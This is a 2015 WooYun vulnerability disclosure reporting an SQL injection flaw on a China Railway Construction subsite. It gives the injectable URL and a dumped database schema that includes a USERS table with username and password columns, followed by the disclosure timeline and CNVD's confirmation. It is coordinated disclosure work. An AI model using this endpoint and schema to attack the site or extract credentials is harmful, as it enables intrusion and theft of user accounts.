当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125034

漏洞标题:中国铁建分站SQL注入漏洞

相关厂商:中国铁建

漏洞作者: missy

提交时间:2015-07-07 17:57

修复时间:2015-08-24 16:40

公开时间:2015-08-24 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

详细说明:

http://cr14g.crcc.cn/NwSendInf.do?MAINID=7e6fd21fbf654897bb23251776c3abbc&MAINCOUNT=3&SUBCOUNT=0&opType=moreList&T_NW_DOCUMENT/IDBIZ=99999999


1.jpg


2.jpg


<Database Text="zt14">
      <Table Text="T_NW_OPINION_VIEWER" />
      <Table Text="T_NW_OPINION_REPLY" />
      <Table Text="AGIDEPT" />
      <Table Text="AGIDATACELL" />
      <Table Text="T_NW_QUESTIONARY" />
      <Table Text="AGIENTITY" />
      <Table Text="AGIEXCELIO" />
      <Table Text="T_NW_QUESTIONCONTENT" />
      <Table Text="AGIFLOW" />
      <Table Text="AGIFLOWACTIVITYINST" />
      <Table Text="T_NW_QUESTIONRESULT" />
      <Table Text="AGIFLOWBIZDATA" />
      <Table Text="T_NW_SCHEDULE" />
      <Table Text="AGIFLOWBTNINF" />
      <Table Text="T_NW_SCHEDULE_EMP" />
      <Table Text="AGIFLOWBTNVALIDITY" />
      <Table Text="T_NW_SETTING" />
      <Table Text="AGIFLOWDATA" />
      <Table Text="AGIFLOWOPINION" />
      <Table Text="T_NW_T_NW_MEETINGROOM" />
      <Table Text="AGIFLOWPOINT" />
      <Table Text="TEST" />
      <Table Text="UNIT" />
      <Table Text="AGIFLOWPOINTCOMMSSION" />
      <Table Text="USERS">
        <Column Text="ID" />
        <Column Text="USERNAME" />
        <Column Text="PASSWORD" />
        <Column Text="ISVALID" />
      </Table>
      <Table Text="AGIFLOWPOINTORG" />
      <Table Text="AGIFLOWINST" />
      <Table Text="Z_OLD_OPINION" />
      <Table Text="AGIFLOWPOINTROLE" />
      <Table Text="AGIEMPLOYEE" />
      <Table Text="AGIFLOWPOINTUSER" />
      <Table Text="Z_OLD_XSBG" />
      <Table Text="AGIFLOWPOINTVERIFY" />
      <Table Text="AGICODE" />
      <Table Text="AGIFLOWPOINTVERIFYDETAIL" />
      <Table Text="Z_OLD_DATA" />
      <Table Text="AGIFLOWSUBPOINT" />
      <Table Text="AGIFORUM" />
      <Table Text="Z_OLD_PERSON" />
      <Table Text="AGIJSPFILE" />
      <Table Text="AGILOB" />
      <Table Text="AGILOG" />
      <Table Text="AGIFLOWPOINTVERIFYCOLUMN" />
      <Table Text="AGILOGIN" />
      <Table Text="T_NW_DOCUMENT" />
      <Table Text="AGIORG" />
      <Table Text="AGIORGEMP" />
      <Table Text="AGIMENU" />
      <Table Text="AGIPLATE" />
      <Table Text="AGIORGTREECONFIG" />
      <Table Text="AGIPMENU" />
      <Table Text="AGIPTEMP" />
      <Table Text="AGIQUERY" />
      <Table Text="AGIPAGE" />
      <Table Text="AGIREL" />
      <Table Text="AGILOGINLOG" />
      <Table Text="AGIREPORT" />
      <Table Text="AGIRIGHT" />
      <Table Text="AGIROLE" />
      <Table Text="AGIROLELOGIN" />
      <Table Text="AGIRULE" />
      <Table Text="AGIRULES" />
      <Table Text="AGISIGN" />
      <Table Text="AGISKIN" />
      <Table Text="AGISTYLE" />
      <Table Text="AGIMORETOMORE" />
      <Table Text="AGISYSCONFIG" />
      <Table Text="AGITIMER" />
      <Table Text="AGIINL" />
      <Table Text="AGIQUERYCODE" />
      <Table Text="AGIWEBOFFFILE" />
      <Table Text="CUST" />
      <Table Text="MEETINGROOM" />
      <Table Text="MEETINGROOM_APPLY_DEFAULT" />
      <Table Text="MEETINGROOM_APPLYINFO" />
      <Table Text="AGITAB" />
      <Table Text="MEETINGROOM_APPLYINFO_BAK" />
      <Table Text="AGIROLEMENU" />
      <Table Text="AGIVERSION" />
      <Table Text="AGIWEBOFFTEMP" />
      <Table Text="T_NW_ALERTINFO" />
      <Table Text="T_NW_ALERTINFO_EMP" />
      <Table Text="T_NW_APPLY_DEFAULT" />
      <Table Text="T_NW_APPLYINFO" />
      <Table Text="T_NW_CARS_APPLY_DEFAULT" />
      <Table Text="MEETINGROOM_BAK" />
      <Table Text="AGITREE" />
      <Table Text="T_NW_CARS_APPLYINFO" />
      <Table Text="T_NW_DOCEXT" />
      <Table Text="T_NW_INPUTINFO" />
      <Table Text="T_NW_IP" />
      <Table Text="T_NW_MAILOUT" />
      <Table Text="T_NW_CARS" />
      <Table Text="T_NW_MEETINGROOM" />
      <Table Text="T_NW_MEETINGROOM_APPLYINFO" />
      <Table Text="MEETINGROOMBAK" />
      <Table Text="T_NW_CHANNEL" />
      <Table Text="T_NW_ONCLICKNUM" />
      <Table Text="AGICOMOPINION" />
      <Table Text="T_NW_OPINION" />
      <Table Text="AGICOMTREE" />
      <Table Text="AGICRUD" />
      <Table Text="T_NW_MEETINGROOM_APPLY_DEFAULT" />
      <Table Text="AGIAPP" />
      <Table Text="PERSON" />
      <Table Text="T_NW_MEETINGROOM_SPINFO" />

漏洞证明:

修复方案:

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-10 16:39

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无

漏洞评价:

评论